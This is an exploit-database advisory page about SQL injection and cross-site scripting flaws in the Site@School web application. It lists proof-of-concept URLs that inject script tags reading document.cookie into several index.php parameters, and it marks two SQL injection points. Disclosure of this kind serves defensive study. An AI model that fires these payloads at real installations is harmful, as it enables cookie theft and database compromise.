header-logo
Suggest Exploit
vendor:
Site@School
by:
Unknown
N/A
CVSS
N/A
SQL-injection and Cross-Site Scripting
Unknown
CWE
Product Name: Site@School
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Multiple SQL-injection and Cross-Site Scripting Vulnerabilities in Site@School

These vulnerabilities allow an attacker to steal authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/50195/info

Site@School is prone to multiple SQL-injection and cross-site scripting vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

XSS:

http://www.example.com/school/starnet/index.php?option=stats&suboption=&#039;"</style></script><script>alert(document.cookie)</script> 

http://www.example.com/school/starnet/index.php?option=pagemanager&suboption=newsection&site=&#039;"</style></script><script>alert(document.cookie)</script> 

http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script> 

http://www.example.com/school/starnet/index.php?option=modulemanager&module=&#039;"</style></script><script>alert(document.cookie)</script>

SQL Injection:

http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection]

http://www.example.com/school/starnet/index.php?option=modulemanager&module=[sql injection]

Navigation

Suggest Exploit

Services By CQR